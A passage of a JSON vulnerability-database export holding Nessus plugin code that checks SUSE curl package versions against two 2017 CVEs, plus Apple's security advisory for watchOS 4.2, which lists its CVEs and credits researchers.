"2021-08-19T12:34:55", "description": "This update for curl fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2017-1000254: FTP PWD response parser out of bounds read (bsc#1061876)\n\n - CVE-2017-1000257: IMAP FETCH response out of bounds read (bsc#1063824)\n\nBugs fixed :\n\n - Fixed error 'error:1408F10B:SSL routines' when connecting to ftps via proxy (bsc#1060653)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"}, "published": "2017-10-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : curl (openSUSE-2017-1200)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254", "CVE-2017-1000257"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:curl", "p-cpe:/a:novell:opensuse:curl-debuginfo", "p-cpe:/a:novell:opensuse:curl-debugsource", "p-cpe:/a:novell:opensuse:libcurl-devel", "p-cpe:/a:novell:opensuse:libcurl-devel-32bit", "p-cpe:/a:novell:opensuse:libcurl4", "p-cpe:/a:novell:opensuse:libcurl4-32bit", "p-cpe:/a:novell:opensuse:libcurl4-debuginfo", "p-cpe:/a:novell:opensuse:libcurl4-debuginfo-32bit", "cpe:/o:novell:opensuse:42.2", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2017-1200.NASL", "href": "https://www.tenable.com/plugins/nessus/104236", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1200.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104236);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-1000254\", \"CVE-2017-1000257\");\n\n script_name(english:\"openSUSE Security Update : curl (openSUSE-2017-1200)\");\n script_summary(english:\"Check for the openSUSE-2017-1200 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for curl fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2017-1000254: FTP PWD response parser out of bounds\n read (bsc#1061876)\n\n - CVE-2017-1000257: IMAP FETCH response out of bounds read\n (bsc#1063824)\n\nBugs fixed :\n\n - Fixed error 'error:1408F10B:SSL routines' when\n connecting to ftps via proxy (bsc#1060653)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1060653\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063824\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected curl packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:curl-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libcurl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libcurl-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libcurl4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libcurl4-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libcurl4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libcurl4-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"curl-7.37.0-16.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"curl-debuginfo-7.37.0-16.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"curl-debugsource-7.37.0-16.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libcurl-devel-7.37.0-16.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libcurl4-7.37.0-16.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libcurl4-debuginfo-7.37.0-16.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libcurl-devel-32bit-7.37.0-16.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libcurl4-32bit-7.37.0-16.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libcurl4-debuginfo-32bit-7.37.0-16.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"curl-7.37.0-23.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"curl-debuginfo-7.37.0-23.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"curl-debugsource-7.37.0-23.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libcurl-devel-7.37.0-23.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libcurl4-7.37.0-23.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libcurl4-debuginfo-7.37.0-23.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libcurl-devel-32bit-7.37.0-23.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libcurl4-32bit-7.37.0-23.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libcurl4-debuginfo-32bit-7.37.0-23.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"curl / curl-debuginfo / curl-debugsource / libcurl-devel-32bit / etc\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-08-19T12:35:13", "description": "This update for curl fixes the following issues: Security issues fixed :\n\n - CVE-2017-1000254: FTP PWD response parser out of bounds read (bsc#1061876)\n\n - CVE-2017-1000257: IMAP FETCH response out of bounds read (bsc#1063824) Bugs fixed :\n\n - Fixed error 'error:1408F10B:SSL routines' when connecting to ftps via proxy (bsc#1060653)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"}, "published": "2017-10-24T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : curl (SUSE-SU-2017:2831-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254", "CVE-2017-1000257"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:curl", "p-cpe:/a:novell:suse_linux:curl-debuginfo", "p-cpe:/a:novell:suse_linux:curl-debugsource", "p-cpe:/a:novell:suse_linux:libcurl4", "p-cpe:/a:novell:suse_linux:libcurl4-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-2831-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104117", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2831-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104117);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000254\", \"CVE-2017-1000257\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : curl (SUSE-SU-2017:2831-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for curl fixes the following issues: Security issues \nfixed :\n\n - CVE-2017-1000254: FTP PWD response parser out of bounds\n read (bsc#1061876)\n\n - CVE-2017-1000257: IMAP FETCH response out of bounds read\n (bsc#1063824) Bugs fixed :\n\n - Fixed error 'error:1408F10B:SSL routines' when\n connecting to ftps via proxy (bsc#1060653)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060653\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000254/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000257/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172831-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ab1d52b2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-1758=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1758=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-1758=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-1758=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1758=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-1758=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-1758=1\n\nSUSE Container as a Service Platform ALL:zypper in -t patch\nSUSE-CAASP-ALL-2017-1758=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-1758=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:curl-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libcurl4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libcurl4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"curl-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"curl-debuginfo-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"curl-debugsource-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libcurl4-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libcurl4-debuginfo-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libcurl4-32bit-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libcurl4-debuginfo-32bit-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"curl-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"curl-debuginfo-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"curl-debugsource-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libcurl4-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libcurl4-debuginfo-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libcurl4-32bit-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libcurl4-debuginfo-32bit-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"curl-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"curl-debuginfo-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"curl-debugsource-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libcurl4-32bit-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libcurl4-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libcurl4-debuginfo-32bit-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libcurl4-debuginfo-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"curl-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"curl-debuginfo-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"curl-debugsource-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libcurl4-32bit-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libcurl4-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libcurl4-debuginfo-32bit-7.37.0-37.8.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libcurl4-debuginfo-7.37.0-37.8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"curl\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}], "apple": [{"lastseen": "2020-12-24T20:41:27", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## watchOS 4.2\n\nReleased December 5, 2017\n\n**Auto Unlock**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added January 10, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple Watch (1st Generation) and Apple Watch Series 3 \nReleased for Apple Watch Series 1 and Apple Watch Series 2 in [watchOS 4.1](<https://support.apple.com/kb/HT208220>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## No impact\n\nwatchOS 4.2 is not impacted by the following issue: \n\n**Kernel**\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-18T06:10:21", "title": "About the security content of watchOS 4.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13869", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-13880", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-13884", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13862"], "modified": "2018-10-18T06:10:21", "id": "APPLE:HT208325", "href": "https://support.apple.com/kb/HT208325", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:38", "description": "# About the security content of watchOS 4.2\n\nThis document describes the security content of watchOS 4.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security 